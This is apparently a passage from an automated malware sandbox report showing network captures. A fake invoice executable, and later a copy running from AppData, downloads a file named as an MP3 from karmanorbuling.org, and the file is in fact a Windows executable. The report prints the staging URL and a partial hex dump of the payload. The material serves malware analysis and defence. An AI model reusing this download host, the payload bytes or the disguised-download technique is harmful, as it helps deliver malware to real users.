                                                                                        Data Ascii: ymbol():void 0,G=F?function(a,b){a[F]|=b}:function(a,b){void 0!==a.g?a.g|=b:Object.defineProperties(a,{g:{value:b,configurable:!0,writable:!0,enumerable:!1}})};function va(a){var b=H(a);1!==(b&1)&&(Object.isFrozen(a)&&(a=Array.prototype.slice.
                                                                                        Nov 18, 2024 08:31:33.208568096 CET1236INData Raw: 31 30 32 33 29 3c 3c 31 31 3b 62 72 65 61 6b 20 61 7d 7d 62 26 26 28 67 3d 28 64 3e 3e 39 26 31 29 2d 31 2c 62 3d 4d 61 74 68 2e 6d 61 78 28 62 2c 65 2d 67 29 2c 31 30 32 34 3c 62 26 26 28 7a 61 28 63 2c 67 2c 7b 7d 29 2c 64 7c 3d 32 35 36 2c 62
                                                                                        Data Ascii: 1023)<<11;break a}}b&&(g=(d>>9&1)-1,b=Math.max(b,e-g),1024<b&&(za(c,g,{}),d|=256,b=1023),d=d&-2095105|(b&1023)<<11)}}I(a,d);return a} function za(a,b,c){for(var d=1023+b,e=a.length,f=d;f<e;f++){var g=a[f];null!=g&&g!==c&&(c[f-b]=g)}a.len
                                                                                        Nov 18, 2024 08:31:33.208815098 CET1236INData Raw: 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 29 3b 76 61 72 20 64 3d 61 2e 6c 65 6e 67 74 68 2c 65 3d 62 26 32 35 36 3f 61 5b 64 2d 31 5d 3a 76 6f 69 64 20 30 3b 64 2b 3d 65 3f 2d 31 3a 30 3b 66 6f 72 28 62 3d 62 26 35 31
                                                                                        Data Ascii: .prototype.slice.call(a);var d=a.length,e=b&256?a[d-1]:void 0;d+=e?-1:0;for(b=b&512?1:0;b<d;b++)a[b]=c(a[b]);if(e){b=a[b]={};for(var f in e)Object.prototype.hasOwnProperty.call(e,f)&&(b[f]=c(e[f]))}return a}function Da(a,b,c,d,e,f){if(null!=a)
                                                                                        Nov 18, 2024 08:31:33.208830118 CET1060INData Raw: 3d 4c 28 62 29 29 7b 69 66 28 62 26 32 35 36 29 72 65 74 75 72 6e 20 61 5b 61 2e 6c 65 6e 67 74 68 2d 31 5d 5b 63 5d 7d 65 6c 73 65 7b 76 61 72 20 65 3d 61 2e 6c 65 6e 67 74 68 3b 69 66 28 64 26 26 62 26 32 35 36 26 26 28 64 3d 61 5b 65 2d 31 5d
                                                                                        Data Ascii: =L(b)){if(b&256)return a[a.length-1][c]}else{var e=a.length;if(d&&b&256&&(d=a[e-1][c],null!=d))return d;b=c+((b>>9&1)-1);if(b<e)return a[b]}}function Ka(a,b,c,d,e){var f=L(b);if(c>=f||e){e=b;if(b&256)f=a[a.length-1];else{if(null==d)return;f=a[
                                                                                        Nov 18, 2024 08:31:33.209018946 CET1236INData Raw: 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 21 31 2c 21 31 29 3b 72 65 74 75 72 6e 20 50 61 28 74 68 69 73 2c 61 2c 21 30 29 7d 3b 54 2e 70 72 6f 74 6f 74 79 70 65 2e 73 3d 4d 3b 54 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3d 66
                                                                                        Data Ascii: ,void 0,void 0,!1,!1);return Pa(this,a,!0)};T.prototype.s=M;T.prototype.toString=function(){return Pa(this,this.h,!1).toString()}; function Pa(a,b,c){var d=a.constructor.v,e=L(J(c?a.h:b)),f=!1;if(d){if(!c){b=Array.prototype.slice.call(b)
                                                                                        Nov 18, 2024 08:31:33.209032059 CET1236INData Raw: 29 3b 76 61 72 20 55 3b 66 75 6e 63 74 69 6f 6e 20 56 28 61 29 7b 74 68 69 73 2e 67 3d 61 7d 56 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 2b 22 22 7d 3b 76
                                                                                        Data Ascii: );var U;function V(a){this.g=a}V.prototype.toString=function(){return this.g+""};var Ta={};function Ua(){return Math.floor(2147483648*Math.random()).toString(36)+Math.abs(Math.floor(2147483648*Math.random())^Date.now()).toString(36)};function
                                                                                        Nov 18, 2024 08:31:33.213367939 CET1236INData Raw: 31 49 47 46 79 5a 53 42 7a 5a 57 56 70 62 6d 63 67 64 47 68 70 63 79 42 74 5a 58 4e 7a 59 57 64 6c 49 47 4a 6c 59 32 46 31 63 32 55 67 59 57 51 67 62 33 49 67 63 32 4e 79 61 58 42 30 49 47 4a 73 62 32 4e 72 61 57 35 6e 49 48 4e 76 5a 6e 52 33 59
                                                                                        Data Ascii: 1IGFyZSBzZWVpbmcgdGhpcyBtZXNzYWdlIGJlY2F1c2UgYWQgb3Igc2NyaXB0IGJsb2NraW5nIHNvZnR3YXJlIGlzIGludGVyZmVyaW5nIHdpdGggdGhpcyBwYWdlLg=="),bb=p.atob("RGlzYWJsZSBhbnkgYWQgb3Igc2NyaXB0IGJsb2NraW5nIHNvZnR3YXJlLCB0aGVuIHJlbG9hZCB0aGlzIHBhZ2Uu");function


                                                                                        HTTPS Proxied Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.749700218.208.91.1374437780C:\Users\user\Desktop\Factura modificada____678979879.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-18 07:30:13 UTC83OUTGET /Ggclxuylpwh.mp3 HTTP/1.1
                                                                                        Host: karmanorbuling.org
                                                                                        Connection: Keep-Alive
                                                                                        2024-11-18 07:30:13 UTC213INHTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        content-type: audio/mpeg
                                                                                        last-modified: Fri, 15 Nov 2024 15:14:50 GMT
                                                                                        accept-ranges: bytes
                                                                                        content-length: 2295808
                                                                                        date: Mon, 18 Nov 2024 07:30:11 GMT
                                                                                        server: LiteSpeed
                                                                                        2024-11-18 07:30:13 UTC1155INData Raw: 34 44 35 41 39 30 30 30 30 33 30 30 30 30 30 30 30 34 30 30 30 30 30 30 46 46 46 46 30 30 30 30 42 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 30 30 30 30 30 30 30 30 45 31 46 42 41 30 45 30 30 42 34 30 39 43 44 32 31 42 38 30 31 34 43 43 44 32 31 35 34 36 38 36 39 37 33 32 30 37 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 36 33 36 31 36 45 36 45 36 46 37 34 32 30 36 32 36 35 32 30 37 32 37 35 36 45 32 30 36 39 36 45 32 30 34 34 34 46 35 33 32 30 36 44 36 46 36 34 36 35 32 45 30 44 30 44 30 41 32 34 30 30 30 30 30 30 30 30 30 30 30 30 30
                                                                                        Data Ascii: 4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240000000000000
                                                                                        2024-11-18 07:30:14 UTC14994INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 33 33 30 30 33 30 30 39 43 30 30 30 30 30 30 30 31 30 30 30 30 31 31 32 38 41 32 30 32 30 30 30 36 32 30 30 33 30 30 30 30 30 30 46 45 30 45 30 30 30 30 33 38 30 30 30 30 30 30 30 30 46 45 30 43 30 30 30 30 34 35 30 35 30 30 30 30 30 30 34 44 30 30 30 30 30 30 34 45 30 30 30 30 30 30 30 35 30 30 30 30 30 30 35 44 30 30 30 30 30 30 32 39 30 30 30 30 30 30 33 38 34 38 30 30 30 30 30 30 32 38 30 34 30 30 30 30 30 36 32 30 30 31 30 30 30 30 30 30 37 45 38 32 30 32 30 30 30 34 37 42 37 33 30 32 30 30 30 34 33 39 43 39 46 46 46 46 46 46 32 36 32 30 30 31 30 30 30 30 30 30 33 38 42 45 46 46 46 46 46 46 32 38 30 35 30 30 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 38 32
                                                                                        Data Ascii: 00000000000000000000000000000133003009C0000000100001128A20200062003000000FE0E00003800000000FE0C000045050000004D0000004E000000050000005D000000290000003848000000280400000620010000007E820200047B7302000439C9FFFFFF26200100000038BEFFFFFF280500000620000000007E82
                                                                                        2024-11-18 07:30:14 UTC16384INData Raw: 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 32 30 30 30 30 31 36 32 41 30 30 30 30 30 30 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 33 33 30 30 33 30 30 38 30 30 30 30 30 30 30 30 31 30 30 30 30 31 31 32 38 41 32 30 32 30 30 30 36 32 30 30 32 30 30 30 30 30 30 46 45 30 45 30 30 30 30
                                                                                        Data Ascii: 30004000000000000000000002A120000142A0000001330030004000000000000000000002A120000142A0000001330030004000000000000000000002A120000162A0000001330030004000000000000000000002A1330030004000000000000000000002A13300300800000000100001128A20200062002000000FE0E0000
                                                                                        2024-11-18 07:30:14 UTC16384INData Raw: 30 30 30 30 31 30 30 30 30 31 31 32 38 41 32 30 32 30 30 30 36 32 30 30 31 30 30 30 30 30 30 46 45 30 45 30 30 30 30 33 38 30 30 30 30 30 30 30 30 46 45 30 43 30 30 30 30 34 35 30 33 30 30 30 30 30 30 32 45 30 30 30 30 30 30 30 35 30 30 30 30 30 30 35 37 30 30 30 30 30 30 33 38 32 39 30 30 30 30 30 30 37 45 41 39 30 32 30 30 30 34 32 38 35 35 30 37 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 38 32 30 32 30 30 30 34 37 42 35 34 30 32 30 30 30 34 33 41 43 43 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 43 31 46 46 46 46 46 46 37 45 41 41 30 32 30 30 30 34 32 38 35 39 30 37 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 38 32 30 32 30 30 30 34 37 42 34 32 30 32 30 30 30 34 33 39 41 33 46 46 46 46 46 46 32 36 32 30 30 32 30 30 30 30 30 30
                                                                                        Data Ascii: 0000100001128A20200062001000000FE0E00003800000000FE0C000045030000002E000000050000005700000038290000007EA9020004285507000620000000007E820200047B540200043ACCFFFFFF26200000000038C1FFFFFF7EAA020004285907000620000000007E820200047B4202000439A3FFFFFF262002000000
                                                                                        2024-11-18 07:30:14 UTC16384INData Raw: 30 30 30 33 38 36 35 46 46 46 46 46 46 30 30 37 45 37 42 30 31 30 30 30 34 37 32 45 44 30 31 30 30 37 30 32 38 44 37 30 32 30 30 30 36 37 33 37 38 30 33 30 30 30 36 32 35 32 38 44 38 30 32 30 30 30 36 31 36 36 41 32 38 44 39 30 32 30 30 30 36 32 35 32 35 32 38 44 38 30 32 30 30 30 36 32 38 44 41 30 32 30 30 30 36 36 39 32 38 44 42 30 32 30 30 30 36 31 33 31 36 32 30 32 30 30 30 30 30 30 30 38 44 31 43 30 30 30 30 30 31 46 45 30 45 32 38 30 30 32 30 43 38 30 30 30 30 30 30 32 30 34 32 30 30 30 30 30 30 35 39 46 45 30 45 31 42 30 30 46 45 30 43 32 38 30 30 32 30 30 30 30 30 30 30 30 30 46 45 30 43 31 42 30 30 39 43 46 45 30 43 32 38 30 30 32 30 30 30 30 30 30 30 30 30 32 30 35 42 30 30 30 30 30 30 32 30 33 44 30 30 30 30 30 30 35 38 39 43 46 45 30 43 32 38
                                                                                        Data Ascii: 0003865FFFFFF007E7B01000472ED01007028D702000673780300062528D8020006166A28D9020006252528D802000628DA0200066928DB020006131620200000008D1C000001FE0E280020C8000000204200000059FE0E1B00FE0C28002000000000FE0C1B009CFE0C28002000000000205B000000203D000000589CFE0C28
                                                                                        2024-11-18 07:30:14 UTC16384INData Raw: 30 30 30 30 30 30 30 33 38 44 31 46 46 46 46 46 46 44 44 46 37 46 38 46 46 46 46 32 30 31 35 30 30 30 30 30 30 33 38 35 34 44 46 46 46 46 46 31 34 31 33 30 33 32 30 30 41 30 30 30 30 30 30 32 38 46 41 30 32 30 30 30 36 33 39 34 32 44 46 46 46 46 46 32 36 32 30 30 38 30 30 30 30 30 30 33 38 33 37 44 46 46 46 46 46 37 33 37 33 30 30 30 30 30 41 38 30 38 31 30 31 30 30 30 34 32 30 31 30 30 30 30 30 30 30 33 38 32 33 44 46 46 46 46 46 30 30 34 31 36 34 30 30 30 30 30 30 30 30 30 30 30 30 39 34 31 38 30 30 30 30 38 46 30 30 30 30 30 30 32 33 31 39 30 30 30 30 33 32 30 30 30 30 30 30 31 37 30 30 30 30 30 31 30 30 30 30 30 30 30 30 41 45 30 30 30 30 30 30 31 33 31 36 30 30 30 30 43 31 31 36 30 30 30 30 35 33 30 30 30 30 30 30 31 37 30 30 30 30 30 31 30 30 30 30
                                                                                        Data Ascii: 000000038D1FFFFFFDDF7F8FFFF20150000003854DFFFFF141303200A00000028FA0200063942DFFFFF2620080000003837DFFFFF737300000A808101000420100000003823DFFFFF004164000000000000941800008F00000023190000320000001700000100000000AE00000013160000C116000053000000170000010000
                                                                                        2024-11-18 07:30:14 UTC16384INData Raw: 30 30 30 33 38 42 44 45 42 46 46 46 46 31 36 31 33 31 38 32 30 38 43 30 30 30 30 30 30 32 38 35 36 30 33 30 30 30 36 33 41 41 42 45 42 46 46 46 46 32 36 32 30 39 36 30 30 30 30 30 30 33 38 41 30 45 42 46 46 46 46 31 31 34 42 31 33 32 41 32 30 39 31 30 31 30 30 30 30 46 45 30 45 37 36 30 30 33 38 38 41 45 42 46 46 46 46 46 45 30 43 32 38 30 30 32 30 30 32 30 30 30 30 30 30 32 30 43 35 30 30 30 30 30 30 32 30 33 34 30 30 30 30 30 30 35 38 39 43 32 30 42 30 30 30 30 30 30 30 46 45 30 45 37 36 30 30 33 38 36 37 45 42 46 46 46 46 46 45 30 43 34 34 30 30 32 30 30 33 30 30 30 30 30 30 46 45 30 43 35 31 30 30 39 43 32 30 41 44 30 30 30 30 30 30 32 38 35 35 30 33 30 30 30 36 33 41 34 45 45 42 46 46 46 46 32 36 32 30 35 39 30 30 30 30 30 30 33 38 34 33 45 42 46 46
                                                                                        Data Ascii: 00038BDEBFFFF161318208C00000028560300063AABEBFFFF26209600000038A0EBFFFF114B132A2091010000FE0E7600388AEBFFFFFE0C2800200200000020C50000002034000000589C20B0000000FE0E76003867EBFFFFFE0C44002003000000FE0C51009C20AD00000028550300063A4EEBFFFF2620590000003843EBFF
                                                                                        2024-11-18 07:30:14 UTC16384INData Raw: 30 32 38 35 35 30 33 30 30 30 36 33 39 42 39 43 42 46 46 46 46 32 36 32 30 31 36 30 32 30 30 30 30 33 38 41 45 43 42 46 46 46 46 31 31 35 43 31 31 32 34 33 46 31 38 32 46 30 30 30 30 32 30 39 41 30 32 30 30 30 30 46 45 30 45 37 36 30 30 33 38 39 33 43 42 46 46 46 46 30 30 32 30 43 44 30 31 30 30 30 30 32 38 35 36 30 33 30 30 30 36 33 39 38 37 43 42 46 46 46 46 32 36 32 30 41 39 30 30 30 30 30 30 33 38 37 43 43 42 46 46 46 46 33 38 34 42 44 45 46 46 46 46 32 30 43 30 30 30 30 30 30 30 32 38 35 36 30 33 30 30 30 36 33 39 36 38 43 42 46 46 46 46 32 36 32 30 34 34 30 30 30 30 30 30 33 38 35 44 43 42 46 46 46 46 32 30 31 34 30 30 30 30 30 30 32 30 32 37 30 30 30 30 30 30 35 38 46 45 30 45 35 31 30 30 32 30 38 36 30 32 30 30 30 30 33 38 34 34 43 42 46 46 46 46
                                                                                        Data Ascii: 0285503000639B9CBFFFF26201602000038AECBFFFF115C11243F182F0000209A020000FE0E76003893CBFFFF0020CD01000028560300063987CBFFFF2620A9000000387CCBFFFF384BDEFFFF20C000000028560300063968CBFFFF262044000000385DCBFFFF2014000000202700000058FE0E510020860200003844CBFFFF
                                                                                        2024-11-18 07:30:14 UTC16384INData Raw: 30 30 35 30 30 30 30 30 30 33 38 34 32 30 30 30 30 30 30 31 31 33 39 33 39 33 42 30 30 30 30 30 30 32 30 30 31 30 30 30 30 30 30 32 38 35 36 30 33 30 30 30 36 33 41 44 34 46 46 46 46 46 46 32 36 32 30 30 31 30 30 30 30 30 30 33 38 43 39 46 46 46 46 46 46 31 31 33 39 32 38 31 43 30 33 30 30 30 36 32 30 30 30 30 30 30 30 30 30 32 38 35 35 30 33 30 30 30 36 33 41 42 33 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 41 38 46 46 46 46 46 46 44 43 32 30 30 30 30 30 30 30 30 30 32 38 35 35 30 33 30 30 30 36 33 39 30 42 46 45 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 30 30 46 45 46 46 46 46 44 44 43 31 44 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 32 38 35 36 30 33 30 30 30 36 33 39 30 46 30 30 30 30 30 30 32 36 32 30 30 30 30 30
                                                                                        Data Ascii: 00500000038420000001139393B000000200100000028560300063AD4FFFFFF26200100000038C9FFFFFF1139281C030006200000000028550300063AB3FFFFFF26200000000038A8FFFFFFDC20000000002855030006390BFEFFFF2620000000003800FEFFFFDDC1DFFFFF2620000000002856030006390F00000026200000
                                                                                        2024-11-18 07:30:14 UTC235INData Raw: 34 30 30 30 30 30 41 32 41 30 30 32 45 30 30 46 45 30 39 30 30 30 30 32 38 36 31 30 30 30 30 30 41 32 41 32 45 30 30 46 45 30 39 30 30 30 30 32 38 46 35 30 30 30 30 30 41 32 41 31 45 30 30 32 38 44 31 30 30 30 30 30 41 32 41 33 41 46 45 30 39 30 30 30 30 46 45 30 39 30 31 30 30 36 46 44 32 30 30 30 30 30 41 32 41 30 30 33 45 30 30 46 45 30 39 30 30 30 30 46 45 30 39 30 31 30 30 32 38 43 31 30 30 30 30 30 41 32 41 33 45 30 30 46 45 30 39 30 30 30 30 46 45 30 39 30 31 30 30 32 38 41 31 30 32 30 30 30 36 32 41 32 41 46 45 30 39 30 30 30 30 36 46 37 34 30 33 30 30 30 36 32 41 30 30 32 45 30 30 46 45 30 39 30 30 30 30 32 38 46 36 30 30 30 30 30 41 32 41 32 45 30 30 46 45 30 39 30 30 30 30 32 38 46 37
                                                                                        Data Ascii: 400000A2A002E00FE090000286100000A2A2E00FE09000028F500000A2A1E0028D100000A2A3AFE090000FE0901006FD200000A2A003E00FE090000FE09010028C100000A2A3E00FE090000FE09010028A10200062A2AFE0900006F740300062A002E00FE09000028F600000A2A2E00FE09000028F7


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.749808218.208.91.1374435784C:\Users\user\AppData\Roaming\WrappedObject.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-18 07:30:36 UTC83OUTGET /Ggclxuylpwh.mp3 HTTP/1.1
                                                                                        Host: karmanorbuling.org
                                                                                        Connection: Keep-Alive
                                                                                        2024-11-18 07:30:36 UTC213INHTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        content-type: audio/mpeg
                                                                                        last-modified: Fri, 15 Nov 2024 15:14:50 GMT
                                                                                        accept-ranges: bytes
                                                                                        content-length: 2295808
                                                                                        date: Mon, 18 Nov 2024 07:30:34 GMT
                                                                                        server: LiteSpeed
                                                                                        2024-11-18 07:30:37 UTC16384INData Raw: 34 44 35 41 39 30 30 30 30 33 30 30 30 30 30 30 30 34 30 30 30 30 30 30 46 46 46 46 30 30 30 30 42 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 30 30 30 30 30 30 30 30 45 31 46 42 41 30 45 30 30 42 34 30 39 43 44 32 31 42 38 30 31 34 43 43 44 32 31 35 34 36 38 36 39 37 33 32 30 37 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 36 33 36 31 36 45 36 45 36 46 37 34 32 30 36 32 36 35 32 30 37 32 37 35 36 45 32 30 36 39 36 45 32 30 34 34 34 46 35 33 32 30 36 44 36 46 36 34 36 35 32 45 30 44 30 44 30 41 32 34 30 30 30 30 30 30 30 30 30 30 30 30 30
                                                                                        Data Ascii: 4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240000000000000
                                                                                        2024-11-18 07:30:37 UTC16384INData Raw: 30 36 32 30 30 32 30 30 30 30 30 30 46 45 30 45 30 30 30 30 33 38 30 30 30 30 30 30 30 30 46 45 30 43 30 30 30 30 34 35 30 33 30 30 30 30 30 30 32 45 30 30 30 30 30 30 30 35 30 30 30 30 30 30 32 46 30 30 30 30 30 30 33 38 32 39 30 30 30 30 30 30 37 45 41 41 30 32 30 30 30 34 32 38 35 39 30 37 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 38 32 30 32 30 30 30 34 37 42 39 33 30 32 30 30 30 34 33 41 43 43 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 43 31 46 46 46 46 46 46 32 41 37 45 41 39 30 32 30 30 30 34 32 38 35 35 30 37 30 30 30 36 32 30 30 31 30 30 30 30 30 30 37 45 38 32 30 32 30 30 30 34 37 42 36 43 30 32 30 30 30 34 33 41 41 32 46 46 46 46 46 46 32 36 32 30 30 31 30 30 30 30 30 30 33 38 39 37 46 46 46 46 46 46 31 32 30 30 30 30 31
                                                                                        Data Ascii: 062002000000FE0E00003800000000FE0C000045030000002E000000050000002F00000038290000007EAA020004285907000620000000007E820200047B930200043ACCFFFFFF26200000000038C1FFFFFF2A7EA9020004285507000620010000007E820200047B6C0200043AA2FFFFFF2620010000003897FFFFFF1200001
                                                                                        2024-11-18 07:30:37 UTC16384INData Raw: 41 33 46 46 46 46 46 46 32 36 32 30 30 32 30 30 30 30 30 30 33 38 39 38 46 46 46 46 46 46 32 41 31 32 30 30 30 30 31 37 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 30 33 33 30 30 38 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 34 31 31 43 30 30 30 30 30 30 30 30 30 30 30 30 44 37 30 30 30 30 30 30 32 42 30 32 30 30 30 30 30 32 30 33 30 30 30 30 33 39 30 30 30 30 30 30 31 37 30 30 30 30 30 31 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 37 32 41 31 33 33 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 31 33 33 30 30 33 30
                                                                                        Data Ascii: A3FFFFFF2620020000003898FFFFFF2A120000172A000000120000142A0000000330080004000000000000000000002A411C000000000000D70000002B0200000203000039000000170000011330030004000000000000000000142A1330030004000000000000000000172A1330030004000000000000000000002A1330030
                                                                                        2024-11-18 07:30:37 UTC16384INData Raw: 32 30 33 44 30 30 30 30 30 30 35 38 39 43 46 45 30 43 32 38 30 30 32 30 30 30 30 30 30 30 30 30 32 30 39 38 30 30 30 30 30 30 32 30 31 41 30 30 30 30 30 30 35 38 39 43 32 30 43 38 30 30 30 30 30 30 32 30 34 32 30 30 30 30 30 30 35 39 46 45 30 45 31 42 30 30 46 45 30 43 32 38 30 30 32 30 30 31 30 30 30 30 30 30 46 45 30 43 31 42 30 30 39 43 32 30 38 44 30 30 30 30 30 30 32 30 32 46 30 30 30 30 30 30 35 39 46 45 30 45 31 42 30 30 46 45 30 43 32 38 30 30 32 30 30 31 30 30 30 30 30 30 46 45 30 43 31 42 30 30 39 43 32 30 43 34 30 30 30 30 30 30 32 30 34 31 30 30 30 30 30 30 35 39 46 45 30 45 31 37 30 30 46 45 30 43 32 38 30 30 32 30 30 31 30 30 30 30 30 30 46 45 30 43 31 37 30 30 39 43 32 30 34 35 30 30 30 30 30 30 32 30 34 38 30 30 30 30 30 30 35 38 46 45 30
                                                                                        Data Ascii: 203D000000589CFE0C280020000000002098000000201A000000589C20C8000000204200000059FE0E1B00FE0C28002001000000FE0C1B009C208D000000202F00000059FE0E1B00FE0C28002001000000FE0C1B009C20C4000000204100000059FE0E1700FE0C28002001000000FE0C17009C2045000000204800000058FE0
                                                                                        2024-11-18 07:30:37 UTC16384INData Raw: 35 33 30 30 30 30 30 30 31 37 30 30 30 30 30 31 30 30 30 30 30 30 30 30 30 45 31 41 30 30 30 30 35 33 30 36 30 30 30 30 36 31 32 30 30 30 30 30 35 33 30 30 30 30 30 30 31 37 30 30 30 30 30 31 30 30 30 30 30 30 30 30 33 45 31 37 30 30 30 30 38 30 30 30 30 30 30 30 42 45 31 37 30 30 30 30 33 32 30 30 30 30 30 30 31 37 30 30 30 30 30 31 31 42 33 30 30 36 30 30 35 41 30 36 30 30 30 30 34 46 30 30 30 30 31 31 30 32 32 38 36 31 30 30 30 30 30 41 30 41 37 45 36 42 30 31 30 30 30 34 33 41 31 42 30 34 30 30 30 30 37 45 35 43 30 31 30 30 30 34 30 43 31 36 30 44 30 38 31 32 30 33 32 38 34 45 30 30 30 30 30 41 37 33 37 34 30 30 30 30 30 41 31 33 30 34 32 30 38 31 30 30 30 30 30 32 32 38 41 33 30 33 30 30 30 36 32 38 36 31 30 30 30 30 30 41 36 46 36 32 30 30 30 30 30
                                                                                        Data Ascii: 5300000017000001000000000E1A000053060000612000005300000017000001000000003E17000080000000BE17000032000000170000011B3006005A0600004F00001102286100000A0A7E6B0100043A1B0400007E5C0100040C160D081203284E00000A737400000A1304208100000228A3030006286100000A6F6200000
                                                                                        2024-11-18 07:30:37 UTC16384INData Raw: 32 36 32 30 35 39 30 30 30 30 30 30 33 38 34 33 45 42 46 46 46 46 31 31 36 38 32 38 31 45 30 33 30 30 30 36 31 36 36 41 32 38 31 46 30 33 30 30 30 36 32 30 30 33 30 31 30 30 30 30 32 38 35 36 30 33 30 30 30 36 33 41 32 36 45 42 46 46 46 46 32 36 32 30 30 37 30 31 30 30 30 30 33 38 31 42 45 42 46 46 46 46 46 45 30 43 32 38 30 30 32 30 31 41 30 30 30 30 30 30 32 30 44 45 30 30 30 30 30 30 32 30 30 34 30 30 30 30 30 30 35 38 39 43 32 30 43 38 30 30 30 30 30 30 32 38 35 36 30 33 30 30 30 36 33 41 46 37 45 41 46 46 46 46 32 36 32 30 44 45 30 31 30 30 30 30 33 38 45 43 45 41 46 46 46 46 46 45 30 43 32 38 30 30 32 30 30 42 30 30 30 30 30 30 32 30 32 39 30 30 30 30 30 30 32 30 31 34 30 30 30 30 30 30 35 39 39 43 32 30 30 45 30 31 30 30 30 30 32 38 35 35 30 33 30
                                                                                        Data Ascii: 2620590000003843EBFFFF1168281E030006166A281F030006200301000028560300063A26EBFFFF262007010000381BEBFFFFFE0C2800201A00000020DE0000002004000000589C20C800000028560300063AF7EAFFFF2620DE01000038ECEAFFFFFE0C2800200B00000020290000002014000000599C200E0100002855030
                                                                                        2024-11-18 07:30:37 UTC16384INData Raw: 32 30 38 36 30 32 30 30 30 30 33 38 34 34 43 42 46 46 46 46 32 30 46 31 30 30 30 30 30 30 32 30 35 30 30 30 30 30 30 30 35 39 46 45 30 45 35 31 30 30 32 30 36 39 30 30 30 30 30 30 33 38 32 42 43 42 46 46 46 46 31 31 31 43 31 31 32 46 31 42 35 38 31 31 34 33 31 42 39 31 39 43 32 30 44 31 30 30 30 30 30 30 46 45 30 45 37 36 30 30 33 38 30 45 43 42 46 46 46 46 46 45 30 43 32 38 30 30 32 30 30 37 30 30 30 30 30 30 32 30 38 42 30 30 30 30 30 30 32 30 34 41 30 30 30 30 30 30 35 39 39 43 32 30 46 45 30 31 30 30 30 30 33 38 46 33 43 41 46 46 46 46 31 32 32 30 31 36 37 44 38 34 30 31 30 30 30 34 32 30 37 46 30 32 30 30 30 30 32 38 35 35 30 33 30 30 30 36 33 41 44 43 43 41 46 46 46 46 32 36 32 30 33 37 30 32 30 30 30 30 33 38 44 31 43 41 46 46 46 46 31 31 31 43 31
                                                                                        Data Ascii: 20860200003844CBFFFF20F1000000205000000059FE0E51002069000000382BCBFFFF111C112F1B5811431B919C20D1000000FE0E7600380ECBFFFFFE0C28002007000000208B000000204A000000599C20FE01000038F3CAFFFF1220167D84010004207F02000028550300063ADCCAFFFF26203702000038D1CAFFFF111C1
